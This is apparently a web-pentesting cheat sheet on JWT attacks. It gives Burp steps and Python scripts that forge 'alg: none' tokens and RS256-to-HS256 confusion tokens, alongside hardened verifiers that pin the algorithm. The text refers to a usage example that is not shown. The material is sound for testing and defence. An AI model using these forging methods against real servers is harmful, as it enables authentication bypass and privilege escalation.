What is a JWT
A JWT (JSON Web Token) is a compact, URL-safe token used to transmit claims between parties as a JSON object. It has three base64url-encoded parts separated by dots: a header (which names the signing algorithm in its "alg" field), a payload of claims (the data), and a signature computed over the first two parts. It is commonly used for authentication and session handling in web applications, which is why the checks below focus on getting the server to accept a token whose claims you changed.
Attack Vectors
# JWT without signature verification
- Send the request to Repeater and confirm it carries a JWT (usually in an Authorization: Bearer header or a cookie).
- Open the "JSON Web Token" tab inside Repeater.
- In the header section, change "alg" to "none" ("alg": "none").
- Remove the signature but keep the trailing dot, so the token becomes header.payload. (three parts, the last one empty).
- Modify the payload to include the desired changes (for example a user id or role claim).
- Send the request. If the server accepts the changed claims, it trusts the "alg" value in the token instead of enforcing its own. If "none" is rejected, also try case variants such as "None" or "NONE": a naive blocklist can miss them while the library compares case-insensitively.
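The same procedure done by hand, as an added example that is not part of the original page: a stdlib-only Python script that issues an HS256 token with a constructed secret, forges an "alg": "none" version with a changed claim, and runs it through two verifiers. The vulnerable verifier is an assumed model of a library that takes the algorithm from the token header; the hardened one pins the algorithm server-side. Secret, claims and function names are all constructed for the demo.

```python
import base64
import hashlib
import hmac
import json
from typing import Optional

# Constructed demo secret; a real server keeps this out of the token entirely.
SERVER_SECRET = b"constructed-demo-hmac-secret"


def b64url(data: bytes) -> str:
    """base64url without padding, as JWT requires."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def _encode_part(obj: dict) -> str:
    return b64url(json.dumps(obj, separators=(",", ":")).encode())


def sign_hs256(payload: dict, secret: bytes) -> str:
    """Issue a legitimately signed HS256 token (what the server hands out)."""
    signing_input = _encode_part({"alg": "HS256", "typ": "JWT"}) + "." + _encode_part(payload)
    sig = hmac.new(secret, signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url(sig)


def forge_none(token: str, changes: dict, alg_value: str = "none") -> str:
    """The Repeater steps above: set alg to none (or a case variant), edit the payload,
    drop the signature. The trailing dot stays: the result is 'header.payload.'."""
    header_b64, payload_b64, _sig = token.split(".")
    header = json.loads(b64url_decode(header_b64))
    payload = json.loads(b64url_decode(payload_b64))
    header["alg"] = alg_value
    payload.update(changes)
    return _encode_part(header) + "." + _encode_part(payload) + "."


def verify_vulnerable(token: str, secret: bytes) -> Optional[dict]:
    """Assumed model of a library that trusts the token's own 'alg': 'none' skips the
    signature check, and a case-insensitive compare also lets 'None' / 'NONE' through."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    header = json.loads(b64url_decode(header_b64))
    alg = str(header.get("alg", ""))
    if alg.lower() == "none":
        return json.loads(b64url_decode(payload_b64))  # the bug: unsigned token accepted
    if alg == "HS256":
        expected = hmac.new(secret, f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
        if hmac.compare_digest(expected, b64url_decode(sig_b64)):
            return json.loads(b64url_decode(payload_b64))
    return None


def verify_hardened(token: str, secret: bytes) -> Optional[dict]:
    """Pins the algorithm server-side: the header's 'alg' is compared against the one
    expected value and never used to choose a code path."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    header = json.loads(b64url_decode(header_b64))
    if header.get("alg") != "HS256":
        return None
    expected = hmac.new(secret, f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(sig_b64)):
        return None
    return json.loads(b64url_decode(payload_b64))


if __name__ == "__main__":
    issued = sign_hs256({"sub": "alice", "admin": False}, SERVER_SECRET)
    forged = forge_none(issued, {"admin": True})
    print("forged token:", forged)
    print("vulnerable verifier returns:", verify_vulnerable(forged, SERVER_SECRET))
    print("hardened verifier returns:", verify_hardened(forged, SERVER_SECRET))
```

The point to take from the two verifiers: the fix is not to blocklist the string "none" but to decide the algorithm on the server and reject any token whose header disagrees.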
----------------------------------------------------------------------------------
# JWT Forge Signature ---> NO PUB KEY
If you don't have the server's public key, you can still generate a key of your own, sign the modified token with it and test whether the server accepts the result; this only works when the server lets the token influence which key it uses for verification.
- More info
----------------------------------------------------------------------------------
# JWT Forge Signature ---> HAVE PUB KEY
This is the algorithm confusion attack. The server verifies RS256 tokens with its RSA public key, but if the library picks the algorithm from the token header, a token relabelled as HS256 gets verified with HMAC using that same public key as the secret. Since the public key is public, anyone can compute a valid signature.
- Get the public key (for example from a JWKS endpoint, a TLS certificate or the application's source).
- Change "alg" in the header from RS256 to HS256.
- Change the claims in the payload (data).
- Use the following website https://www.devglan.com/online-tools/hmac-sha256-online (or any HMAC-SHA256 tool).
- Insert the base64url-encoded header and payload joined by a dot (header.payload) as the "plain text to compute hash".
- Insert the public key, byte for byte as the server holds it (full PEM text including line breaks and any trailing newline), as the "Secret Key".
- Compute the HMAC with base64 output, then convert it to base64url: replace + with -, / with _ and strip trailing = padding, because JWT signatures use unpadded base64url.
- Append the new signature to the modified header and payload.
- If the token is rejected, the usual cause is a mismatch in the exact key bytes (trailing newline, CRLF vs LF, PEM vs JWK form): the HMAC secret must be identical to what the server feeds its verifier.
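The confusion attack end to end, as an added example that is not part of the original page: a stdlib-only Python script that relabels a constructed RS256 token as HS256, signs it with the public-key bytes as the HMAC secret, and runs it through an assumed model of a vulnerable decode(token, key) call next to a pinned-algorithm verifier. The PEM constant is a constructed placeholder (the attack treats the key as opaque bytes), real RSA verification is stood in for by the hypothetical demo_rsa_verify, and standard_to_base64url covers the conversion step needed when an online tool emits standard base64.

```python
import base64
import hashlib
import hmac
import json
from typing import Callable, Optional

# Constructed placeholder standing in for the server's RSA public key. The confusion
# attack treats the key as an opaque byte string: the bytes must match what the server
# loads, newlines included, but for this demo it need not be a parseable RSA key.
PUBLIC_KEY_PEM = (
    b"-----BEGIN PUBLIC KEY-----\n"
    b"CONSTRUCTED-DEMO-BYTES-NOT-A-REAL-RSA-KEY\n"
    b"-----END PUBLIC KEY-----\n"
)

# (signing_input, signature, public_key) -> ok; injected so the demo needs no RSA library.
RsaVerify = Callable[[str, bytes, bytes], bool]


def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def _encode_part(obj: dict) -> str:
    return b64url(json.dumps(obj, separators=(",", ":")).encode())


def header_of(token: str) -> dict:
    return json.loads(b64url_decode(token.split(".")[0]))


def hs256_signature_b64url(signing_input: str, key: bytes) -> str:
    """HMAC-SHA256 over 'header.payload', unpadded base64url as JWT requires."""
    return b64url(hmac.new(key, signing_input.encode(), hashlib.sha256).digest())


def standard_to_base64url(sig_std: str) -> str:
    """Turn the standard-base64 output of a generic HMAC tool into JWT's base64url."""
    return sig_std.strip().replace("+", "-").replace("/", "_").rstrip("=")


def forge_hs256_with_public_key(token: str, changes: dict, public_key_pem: bytes) -> str:
    """The steps above: relabel RS256 as HS256, edit the claims, sign with HMAC using the
    public key bytes as the secret, and append the new signature."""
    header_b64, payload_b64, _sig = token.split(".")
    header = json.loads(b64url_decode(header_b64))
    payload = json.loads(b64url_decode(payload_b64))
    header["alg"] = "HS256"
    payload.update(changes)
    signing_input = _encode_part(header) + "." + _encode_part(payload)
    return signing_input + "." + hs256_signature_b64url(signing_input, public_key_pem)


def verify_vulnerable(token: str, key: bytes, rsa_verify: RsaVerify) -> Optional[dict]:
    """Assumed model of decode(token, key) in a library that picks the algorithm from the
    header and hands the same 'key' to whichever primitive it names: RSA public key for
    RS256, HMAC secret for HS256. The attacker chooses which branch runs."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    alg = json.loads(b64url_decode(header_b64)).get("alg")
    signing_input = f"{header_b64}.{payload_b64}"
    if alg == "HS256":
        expected = hs256_signature_b64url(signing_input, key)
        ok = hmac.compare_digest(expected.encode(), sig_b64.encode())
    elif alg == "RS256":
        ok = rsa_verify(signing_input, b64url_decode(sig_b64), key)
    else:
        ok = False
    return json.loads(b64url_decode(payload_b64)) if ok else None


def verify_hardened(token: str, public_key_pem: bytes, rsa_verify: RsaVerify) -> Optional[dict]:
    """Pins the algorithm: anything but RS256 is rejected before the key is touched, so
    the public key can never be fed into an HMAC."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    if json.loads(b64url_decode(header_b64)).get("alg") != "RS256":
        return None
    if not rsa_verify(f"{header_b64}.{payload_b64}", b64url_decode(sig_b64), public_key_pem):
        return None
    return json.loads(b64url_decode(payload_b64))


def constructed_rs256_token(payload: dict) -> str:
    """Stand-in for the token the server issued. The RSA signature is a constructed
    placeholder; the attack only needs the header and payload."""
    return (_encode_part({"alg": "RS256", "typ": "JWT"}) + "." + _encode_part(payload)
            + "." + b64url(b"constructed-rsa-signature"))


def demo_rsa_verify(signing_input: str, signature: bytes, key: bytes) -> bool:
    """Hypothetical stand-in for real RSA verification: accepts only the constructed
    placeholder signature, so the RS256 path itself stays closed to tampering."""
    return signature == b"constructed-rsa-signature"
```

The trailing-newline check in the usage below is the caveat that costs the most time in practice: HMAC over the PEM text with and without its final newline gives unrelated signatures, and the server will only accept the one computed over the exact bytes it loaded.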